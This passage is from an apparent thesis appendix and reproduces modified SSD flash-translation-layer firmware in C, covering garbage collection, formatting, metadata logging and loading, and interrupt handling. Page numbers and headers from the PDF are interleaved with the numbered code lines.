624 {

625 if (tst_bit_dram(BAD_BLK_BMP_ADDR + bank*(VBLKS_PER_BANK/8 + 1), vblk_offset) == FALSE)

626 {

627 return FALSE;

628 }

629 return TRUE;

630 }

631 //------

632 // if all blocks except one free block are full,

633 // do garbage collection for making at least one free page

634 //------

635 static void garbage_collection(UINT32 const bank)

636 {

637 ASSERT(bank < NUM_BANKS);

638 g_ftl_statistics[bank].gc_cnt++;

640 UINT32 src_lpn;

641 UINT32 vt_vblock; 140 Appendix A. Modified FTL Code - Clearing DRAM

642 UINT32 free_vpn;

643 UINT32 vcount; // valid page count in victim block

644 UINT32 src_page;

645 UINT32 gc_vblock;

647 g_ftl_statistics[bank].gc_cnt++;

649 vt_vblock = get_vt_vblock(bank); // get victim block

650 vcount = get_vcount(bank, vt_vblock);

651 gc_vblock = get_gc_vblock(bank);

652 free_vpn = gc_vblock * PAGES_PER_BLK;

654 /* uart_printf("garbage_collection bank %d, vblock %d",bank, vt_vblock); */

656 ASSERT(vt_vblock != gc_vblock);

657 ASSERT(vt_vblock >= META_BLKS_PER_BANK && vt_vblock < VBLKS_PER_BANK);

658 ASSERT(vcount < (PAGES_PER_BLK - 1));

659 ASSERT(get_vcount(bank, gc_vblock) == VC_MAX);

660 ASSERT(!is_bad_block(bank, gc_vblock));

662 // 1. load p2l list from last page offset of victim block (4B x PAGES_PER_BLK)

663 // fix minor bug

664 nand_page_ptread(bank, vt_vblock, PAGES_PER_BLK - 1, 0,

665 ((sizeof(UINT32) * PAGES_PER_BLK + BYTES_PER_SECTOR - 1 ) / BYTES_PER_SECTOR), FTL_BUF(bank), RETURN_WHEN_DONE );

666 mem_copy(g_misc_meta[bank].lpn_list_of_cur_vblock, FTL_BUF(bank), sizeof( UINT32) * PAGES_PER_BLK);

667 // 2. copy-back all valid pages to free space 141

668 for (src_page = 0; src_page < (PAGES_PER_BLK - 1); src_page++)

669 {

670 // get lpn of victim block from a read lpn list

671 src_lpn = get_lpn(bank, src_page);

672 CHECK_VPAGE(get_vpn(src_lpn));

674 // determine whether the page is valid or not

675 if (get_vpn(src_lpn) !=

676 ((vt_vblock * PAGES_PER_BLK) + src_page))

677 {

678 // invalid page

679 continue;

680 }

681 ASSERT(get_lpn(bank, src_page) != INVALID);

682 CHECK_LPAGE(src_lpn);

683 // if the page is valid,

684 // then do copy-back op. to free space

685 nand_page_copyback(bank,

686 vt_vblock ,

687 src_page ,

688 free_vpn / PAGES_PER_BLK,

689 free_vpn % PAGES_PER_BLK);

690 ASSERT((free_vpn / PAGES_PER_BLK) == gc_vblock);

691 // update metadata

692 set_vpn(src_lpn, free_vpn);

693 set_lpn(bank, (free_vpn % PAGES_PER_BLK), src_lpn);

695 free_vpn++;

696 }

697 #if OPTION_ENABLE_ASSERT

698 if (vcount == 0) 142 Appendix A. Modified FTL Code - Clearing DRAM

699 {

700 ASSERT(free_vpn == (gc_vblock * PAGES_PER_BLK));

701 }

702 #endif

703 // 3. erase victim block

704 nand_block_erase(bank, vt_vblock);

705 ASSERT((free_vpn % PAGES_PER_BLK) < (PAGES_PER_BLK - 2));

706 ASSERT((free_vpn % PAGES_PER_BLK == vcount));

708 /* uart_printf("gc page count : %d", vcount); */

710 // 4. update metadata

711 set_vcount(bank, vt_vblock, VC_MAX);

712 set_vcount(bank, gc_vblock, vcount);

713 set_new_write_vpn(bank, free_vpn); // set a free page for new write

714 set_gc_vblock(bank, vt_vblock); // next free block (reserve for GC)

715 dec_full_blk_cnt(bank); // decrease full block count

716 /* uart_print("garbage_collection end"); */

717 }

718 //------

719 // Victim selection policy: Greedy

720 //

721 // Select the block which contain minumum valid pages

722 //------

723 static UINT32 get_vt_vblock(UINT32 const bank)

724 {

725 ASSERT(bank < NUM_BANKS);

727 UINT32 vblock;

729 // search the block which has mininum valid pages 143

730 vblock = mem_search_min_max(VCOUNT_ADDR + (bank * VBLKS_PER_BANK * sizeof( UINT16)),

731 sizeof(UINT16),

732 VBLKS_PER_BANK,

733 MU_CMD_SEARCH_MIN_DRAM);

735 ASSERT(is_bad_block(bank, vblock) == FALSE);

736 ASSERT(vblock >= META_BLKS_PER_BANK && vblock < VBLKS_PER_BANK);

737 ASSERT(get_vcount(bank, vblock) < (PAGES_PER_BLK - 1));

739 return vblock;

740 }

741 static void format(void)

742 {

743 UINT32 bank, vblock, vcount_val;

745 ASSERT(NUM_MISC_META_SECT > 0);

746 ASSERT(NUM_VCOUNT_SECT > 0);

748 uart_printf("Total FTL DRAM metadata size: %d KB", DRAM_BYTES_OTHER / 1024);

750 uart_printf("VBLKS_PER_BANK: %d", VBLKS_PER_BANK);

751 uart_printf("LBLKS_PER_BANK: %d", NUM_LPAGES / PAGES_PER_BLK / NUM_BANKS);

752 uart_printf("META_BLKS_PER_BANK: %d", META_BLKS_PER_BANK);

754 //------

755 // initialize DRAM metadata

756 //------

757 mem_set_dram(PAGE_MAP_ADDR, NULL, PAGE_MAP_BYTES);

758 mem_set_dram(VCOUNT_ADDR, NULL, VCOUNT_BYTES); 144 Appendix A. Modified FTL Code - Clearing DRAM

760 //------

761 // erase all blocks except vblock #0

762 //------

763 for (vblock = MISCBLK_VBN; vblock < VBLKS_PER_BANK; vblock++)

764 {

765 for (bank = 0; bank < NUM_BANKS; bank++)

766 {

767 vcount_val = VC_MAX;

768 if (is_bad_block(bank, vblock) == FALSE)

769 {

770 nand_block_erase(bank, vblock);

771 vcount_val = 0;

772 }

773 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16),

774 vcount_val);

775 }

776 }

777 //------

778 // initialize SRAM metadata

779 //------

780 init_metadata_sram();

782 // flush metadata to NAND

783 logging_pmap_table();

784 logging_misc_metadata();

786 write_format_mark();

787 led(1);

788 uart_print("format complete"); 145

789 }

790 static void init_metadata_sram(void)

791 {

792 UINT32 bank;

793 UINT32 vblock;

794 UINT32 mapblk_lbn;

796 //------

797 // initialize misc. metadata

798 //------

799 for (bank = 0; bank < NUM_BANKS; bank++)

800 {

801 g_misc_meta[bank].free_blk_cnt = VBLKS_PER_BANK - META_BLKS_PER_BANK;

802 g_misc_meta[bank].free_blk_cnt -= get_bad_blk_cnt(bank);

803 // NOTE: vblock #0,1 don't use for user space

804 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + 0) * sizeof( UINT16), VC_MAX);

805 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + 1) * sizeof( UINT16), VC_MAX);

807 //------

808 // assign misc. block

809 //------

810 // assumption: vblock #1 = fixed location.

811 // Thus if vblock #1 is a bad block, it should be allocate another block.

812 set_miscblk_vpn(bank, MISCBLK_VBN * PAGES_PER_BLK - 1);

813 ASSERT(is_bad_block(bank, MISCBLK_VBN) == FALSE);

815 vblock = MISCBLK_VBN; 146 Appendix A. Modified FTL Code - Clearing DRAM

817 //------

818 // assign map block

819 //------

820 mapblk_lbn = 0;

821 while (mapblk_lbn < MAPBLKS_PER_BANK)

822 {

823 vblock++;

824 ASSERT(vblock < VBLKS_PER_BANK);

825 if (is_bad_block(bank, vblock) == FALSE)

826 {

827 set_mapblk_vpn(bank, mapblk_lbn, vblock * PAGES_PER_BLK);

828 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16), VC_MAX);

829 mapblk_lbn++;

830 }

831 }

832 //------

833 // assign free block for gc

834 //------

835 do

836 {

837 vblock++;

838 // NOTE: free block should not be secleted as a victim @ first GC

839 write_dram_16(VCOUNT_ADDR + ((bank * VBLKS_PER_BANK) + vblock) * sizeof(UINT16), VC_MAX);

840 // set free block

841 set_gc_vblock(bank, vblock);

843 ASSERT(vblock < VBLKS_PER_BANK);

844 }while(is_bad_block(bank, vblock) == TRUE);

845 //------147

846 // assign free vpn for first new write

847 //------

848 do

849 {

850 vblock++;

851 // ￿￿ next ￿￿vblock ￿￿￿￿￿￿￿￿￿￿￿￿

852 set_new_write_vpn(bank, vblock * PAGES_PER_BLK);

853 ASSERT(vblock < VBLKS_PER_BANK);

854 }while(is_bad_block(bank, vblock) == TRUE);

855 }

856 }

857 // logging misc + vcount metadata

858 static void logging_misc_metadata(void)

859 {

860 UINT32 misc_meta_bytes = NUM_MISC_META_SECT * BYTES_PER_SECTOR; // per bank

861 UINT32 vcount_addr = VCOUNT_ADDR;

862 UINT32 vcount_bytes = NUM_VCOUNT_SECT * BYTES_PER_SECTOR; // per bank

863 UINT32 vcount_boundary = VCOUNT_ADDR + VCOUNT_BYTES; // entire vcount data

864 UINT32 bank;

866 flash_finish();

868 for (bank = 0; bank < NUM_BANKS; bank++)

869 {

870 inc_miscblk_vpn(bank);

872 // note: if misc. meta block is full, just erase old block & write offset #0

873 if ((get_miscblk_vpn(bank) / PAGES_PER_BLK) != MISCBLK_VBN)

874 { 148 Appendix A. Modified FTL Code - Clearing DRAM

875 nand_block_erase(bank, MISCBLK_VBN);

876 set_miscblk_vpn(bank, MISCBLK_VBN * PAGES_PER_BLK); // vpn = 128

877 }

878 // copy misc. metadata to FTL buffer

879 mem_copy(FTL_BUF(bank), &g_misc_meta[bank], misc_meta_bytes);

881 // copy vcount metadata to FTL buffer

882 if (vcount_addr <= vcount_boundary)

883 {

884 mem_copy(FTL_BUF(bank) + misc_meta_bytes, vcount_addr, vcount_bytes);

885 vcount_addr += vcount_bytes;

886 }

887 }

888 // logging the misc. metadata to nand flash

889 for (bank = 0; bank < NUM_BANKS; bank++)

890 {

891 nand_page_ptprogram(bank,

892 get_miscblk_vpn(bank) / PAGES_PER_BLK,

893 get_miscblk_vpn(bank) % PAGES_PER_BLK,

894 0,

895 NUM_MISC_META_SECT + NUM_VCOUNT_SECT,

896 FTL_BUF(bank));

897 }

898 flash_finish();

899 }

900 static void logging_pmap_table(void)

901 {

902 UINT32 pmap_addr = PAGE_MAP_ADDR;

903 UINT32 pmap_bytes = BYTES_PER_PAGE; // per bank

904 UINT32 mapblk_vpn; 149

905 UINT32 bank;

906 UINT32 pmap_boundary = PAGE_MAP_ADDR + PAGE_MAP_BYTES;

907 BOOL32 finished = FALSE;

909 for (UINT32 mapblk_lbn = 0; mapblk_lbn < MAPBLKS_PER_BANK; mapblk_lbn++)

910 {

911 flash_finish();

913 for (bank = 0; bank < NUM_BANKS; bank++)

914 {

915 if (finished)

916 {

917 break;

918 }

919 else if (pmap_addr >= pmap_boundary)

920 {

921 finished = TRUE;

922 break;

923 }

924 else if (pmap_addr + BYTES_PER_PAGE >= pmap_boundary)

925 {

926 finished = TRUE;

927 pmap_bytes = (pmap_boundary - pmap_addr + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR ;

928 }

929 inc_mapblk_vpn(bank, mapblk_lbn);

931 mapblk_vpn = get_mapblk_vpn(bank, mapblk_lbn);

933 // note: if there is no free page, then erase old map block first.

934 if ((mapblk_vpn % PAGES_PER_BLK) == 0) 150 Appendix A. Modified FTL Code - Clearing DRAM

935 {

936 // erase full map block

937 nand_block_erase(bank, (mapblk_vpn - 1) / PAGES_PER_BLK);

939 // next vpn of mapblk is offset #0

940 set_mapblk_vpn(bank, mapblk_lbn, ((mapblk_vpn - 1) / PAGES_PER_BLK)*PAGES_PER_BLK);

941 mapblk_vpn = get_mapblk_vpn(bank, mapblk_lbn);

942 }

943 // copy the page mapping table to FTL buffer

944 mem_copy(FTL_BUF(bank), pmap_addr, pmap_bytes);

946 // logging update page mapping table into map_block

947 nand_page_ptprogram(bank,

948 mapblk_vpn / PAGES_PER_BLK,

949 mapblk_vpn % PAGES_PER_BLK,

950 0,

951 pmap_bytes / BYTES_PER_SECTOR,

952 FTL_BUF(bank));

953 pmap_addr += pmap_bytes;

954 }

955 if (finished)

956 {

957 break;

958 }

959 }

960 flash_finish();

961 }

962 // load flushed FTL metadta

963 static void load_metadata(void)

964 { 151

965 load_misc_metadata();

966 load_pmap_table();

967 }

968 // misc + VCOUNT

969 static void load_misc_metadata(void)

970 {

971 UINT32 misc_meta_bytes = NUM_MISC_META_SECT * BYTES_PER_SECTOR;

972 UINT32 vcount_bytes = NUM_VCOUNT_SECT * BYTES_PER_SECTOR;

973 UINT32 vcount_addr = VCOUNT_ADDR;

974 UINT32 vcount_boundary = VCOUNT_ADDR + VCOUNT_BYTES;

976 UINT32 load_flag = 0;

977 UINT32 bank, page_num;

978 UINT32 load_cnt = 0;

980 flash_finish();

982 disable_irq();

983 flash_clear_irq(); // clear any flash interrupt flags that might have been set

985 // scan valid metadata in descending order from last page offset

986 for (page_num = PAGES_PER_BLK - 1; page_num != ((UINT32) -1); page_num--)

987 {

988 for (bank = 0; bank < NUM_BANKS; bank++)

989 {

990 if (load_flag & (0x1 << bank))

991 {

992 continue;

993 }

994 // read valid metadata from misc. metadata area 152 Appendix A. Modified FTL Code - Clearing DRAM

995 nand_page_ptread(bank,

996 MISCBLK_VBN,

997 page_num ,

998 0,

999 NUM_MISC_META_SECT + NUM_VCOUNT_SECT,

1000 FTL_BUF(bank),

1001 RETURN_ON_ISSUE);

1002 }

1003 flash_finish();

1005 for (bank = 0; bank < NUM_BANKS; bank++)

1006 {

1007 if (!(load_flag & (0x1 << bank)) && !(BSP_INTR(bank) & FIRQ_ALL_FF ))

1008 {

1009 load_flag = load_flag | (0x1 << bank);

1010 load_cnt++;

1011 }

1012 CLR_BSP_INTR(bank, 0xFF);

1013 }

1014 }

1015 ASSERT(load_cnt == NUM_BANKS);

1017 for (bank = 0; bank < NUM_BANKS; bank++)

1018 {

1019 // misc. metadata

1020 mem_copy(&g_misc_meta[bank], FTL_BUF(bank), sizeof(misc_metadata));

1022 // vcount metadata

1023 if (vcount_addr <= vcount_boundary)

1024 { 153

1025 mem_copy(vcount_addr, FTL_BUF(bank) + misc_meta_bytes, vcount_bytes);

1026 vcount_addr += vcount_bytes;

1028 }

1029 }

1030 enable_irq();

1031 }

1032 static void load_pmap_table(void)

1033 {

1034 UINT32 pmap_addr = PAGE_MAP_ADDR;

1035 UINT32 temp_page_addr;

1036 UINT32 pmap_bytes = BYTES_PER_PAGE; // per bank

1037 UINT32 pmap_boundary = PAGE_MAP_ADDR + (NUM_LPAGES * sizeof(UINT32));

1038 UINT32 mapblk_lbn, bank;

1039 BOOL32 finished = FALSE;

1041 flash_finish();

1043 for (mapblk_lbn = 0; mapblk_lbn < MAPBLKS_PER_BANK; mapblk_lbn++)

1044 {

1045 temp_page_addr = pmap_addr; // backup page mapping addr

1047 for (bank = 0; bank < NUM_BANKS; bank++)

1048 {

1049 if (finished)

1050 {

1051 break;

1052 }

1053 else if (pmap_addr >= pmap_boundary)

1054 { 154 Appendix A. Modified FTL Code - Clearing DRAM

1055 finished = TRUE;

1056 break;

1057 }

1058 else if (pmap_addr + BYTES_PER_PAGE >= pmap_boundary)

1059 {

1060 finished = TRUE;

1061 pmap_bytes = (pmap_boundary - pmap_addr + BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR;

1062 }

1063 // read page mapping table from map_block

1064 nand_page_ptread(bank,

1065 get_mapblk_vpn(bank, mapblk_lbn) / PAGES_PER_BLK,

1066 get_mapblk_vpn(bank, mapblk_lbn) % PAGES_PER_BLK,

1067 0,

1068 pmap_bytes / BYTES_PER_SECTOR,

1069 FTL_BUF(bank),

1070 RETURN_ON_ISSUE);

1071 pmap_addr += pmap_bytes;

1072 }

1073 flash_finish();

1075 pmap_bytes = BYTES_PER_PAGE;

1076 for (bank = 0; bank < NUM_BANKS; bank++)

1077 {

1078 if (temp_page_addr >= pmap_boundary)

1079 {

1080 break;

1081 }

1082 else if (temp_page_addr + BYTES_PER_PAGE >= pmap_boundary)

1083 {

1084 pmap_bytes = (pmap_boundary - temp_page_addr + 155

BYTES_PER_SECTOR - 1) / BYTES_PER_SECTOR * BYTES_PER_SECTOR;

1085 }

1086 // copy page mapping table to PMAP_ADDR from FTL buffer

1087 mem_copy(temp_page_addr, FTL_BUF(bank), pmap_bytes);

1089 temp_page_addr += pmap_bytes;

1090 }

1091 if (finished)

1092 {

1093 break;

1094 }

1095 }

1096 }

1097 static void write_format_mark(void)

1098 {

1099 // This function writes a format mark to a page at (bank #0, block #0).

1101 #ifdef __GNUC__

1102 extern UINT32 size_of_firmware_image;

1103 UINT32 firmware_image_pages = (((UINT32) (&size_of_firmware_image)) + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1104 #else

1105 extern UINT32 Image$$ER_CODE$$RO$$Length;

1106 extern UINT32 Image$$ER_RW$$RW$$Length;

1107 UINT32 firmware_image_bytes = ((UINT32) &Image$$ER_CODE$$RO$$Length) + (( UINT32) &Image$$ER_RW$$RW$$Length);

1108 UINT32 firmware_image_pages = (firmware_image_bytes + BYTES_PER_FW_PAGE - 1) /BYTES_PER_FW_PAGE;

1109 #endif 156 Appendix A. Modified FTL Code - Clearing DRAM

1111 UINT32 format_mark_page_offset = FW_PAGE_OFFSET + firmware_image_pages;

1113 mem_set_dram(FTL_BUF_ADDR, 0, BYTES_PER_SECTOR);

1115 SETREG(FCP_CMD,FC_COL_ROW_IN_PROG);

1116 SETREG(FCP_BANK, REAL_BANK(0));

1117 SETREG(FCP_OPTION, FO_E | FO_B_W_DRDY);

1118 SETREG(FCP_DMA_ADDR,FTL_BUF_ADDR); // DRAM -> flash

1119 SETREG(FCP_DMA_CNT,BYTES_PER_SECTOR);

1120 SETREG(FCP_COL, 0);

1121 SETREG(FCP_ROW_L(0), format_mark_page_offset);

1122 SETREG(FCP_ROW_H(0), format_mark_page_offset);

1124 // At this point, we do not have to check Waiting Room status before issuing a command ,

1125 // because we have waited for all the banks to become idle before returning from format().

1126 SETREG(FCP_ISSUE,NULL);

1128 // wait for the FC_COL_ROW_IN_PROG command to be accepted by bank #0

1129 while ((GETREG(WR_STAT) & 0x00000001) != 0);

1131 // wait until bank #0 finishes the write operation

1132 while (BSP_FSM(0) != BANK_IDLE);

1133 }

1134 static BOOL32 check_format_mark(void)

1135 {

1136 // This function reads a flash page from (bank #0, block #0) in order to check whether the SSD is formatted or not.

1138 #ifdef __GNUC__ 157

1139 extern UINT32 size_of_firmware_image;

1140 UINT32 firmware_image_pages = (((UINT32) (&size_of_firmware_image)) + BYTES_PER_FW_PAGE - 1) / BYTES_PER_FW_PAGE;

1141 #else

1142 extern UINT32 Image$$ER_CODE$$RO$$Length;

1143 extern UINT32 Image$$ER_RW$$RW$$Length;

1144 UINT32 firmware_image_bytes = ((UINT32) &Image$$ER_CODE$$RO$$Length) + (( UINT32) &Image$$ER_RW$$RW$$Length);

1145 UINT32 firmware_image_pages = (firmware_image_bytes + BYTES_PER_FW_PAGE - 1) /BYTES_PER_FW_PAGE;

1146 #endif

1148 UINT32 format_mark_page_offset = FW_PAGE_OFFSET + firmware_image_pages;

1149 UINT32 temp;

1151 flash_clear_irq(); // clear any flash interrupt flags that might have been set

1153 SETREG(FCP_CMD,FC_COL_ROW_READ_OUT);

1154 SETREG(FCP_BANK, REAL_BANK(0));

1155 SETREG(FCP_OPTION,FO_E);

1156 SETREG(FCP_DMA_ADDR,FTL_BUF_ADDR); // flash -> DRAM

1157 SETREG(FCP_DMA_CNT,BYTES_PER_SECTOR);

1158 SETREG(FCP_COL, 0);

1159 SETREG(FCP_ROW_L(0), format_mark_page_offset);

1160 SETREG(FCP_ROW_H(0), format_mark_page_offset);

1162 // At this point, we do not have to check Waiting Room status before issuing a command ,

1163 // because scan list loading has been completed just before this function is called. 158 Appendix A. Modified FTL Code - Clearing DRAM

1164 SETREG(FCP_ISSUE,NULL);

1166 // wait for the FC_COL_ROW_READ_OUT command to be accepted by bank #0

1167 while ((GETREG(WR_STAT) & 0x00000001) != 0);

1169 // wait until bank #0 finishes the read operation

1170 while (BSP_FSM(0) != BANK_IDLE);

1172 // Now that the read operation is complete, we can check interrupt flags.

1173 temp = BSP_INTR(0) & FIRQ_ALL_FF;

1175 // clear interrupt flags

1176 CLR_BSP_INTR(0, 0xFF);

1178 if (temp != 0)

1179 {

1180 return FALSE; // the page contains all-0xFF (the format mark does not exist.)

1181 }

1182 else

1183 {

1184 return TRUE; // the page contains something other than 0xFF (it must be the format mark)

1185 }

1186 }

1188 // BSP interrupt service routine

1189 void ftl_isr(void)

1190 {

1191 UINT32 bank;

1192 UINT32 bsp_intr_flag; 159

1194 uart_print("BSP interrupt occured...");

1195 // interrupt pending clear (ICU)

1196 SETREG(APB_INT_STS,INTR_FLASH);

1198 for (bank = 0; bank < NUM_BANKS; bank++) {

1199 while (BSP_FSM(bank) != BANK_IDLE);

1200 // get interrupt flag from BSP

1201 bsp_intr_flag = BSP_INTR(bank);

1203 if (bsp_intr_flag == 0) {

1204 continue;

1205 }

1206 UINT32 fc = GETREG(BSP_CMD(bank));

1207 // BSP clear

1208 CLR_BSP_INTR(bank, bsp_intr_flag);

1210 // interrupt handling

1211 if (bsp_intr_flag & FIRQ_DATA_CORRUPT) {

1212 uart_printf("BSP interrupt at bank: 0x%x", bank);

1213 uart_print("FIRQ_DATA_CORRUPT occured...");

1214 }

1215 if (bsp_intr_flag & (FIRQ_BADBLK_H | FIRQ_BADBLK_L)) {

1216 uart_printf("BSP interrupt at bank: 0x%x", bank);

1217 if (fc == FC_COL_ROW_IN_PROG || fc == FC_IN_PROG || fc == FC_PROG) {

1218 uart_print("find runtime bad block when block program...");

1219 }

1220 else {

1221 uart_printf("find runtime bad block when block erase...vblock #: %d", GETREG(BSP_ROW_H(bank)) / PAGES_PER_BLK);

1222 ASSERT(fc == FC_ERASE); 160 Appendix A. Modified FTL Code - Clearing DRAM

1223 }

1224 }

1225 }

1226 }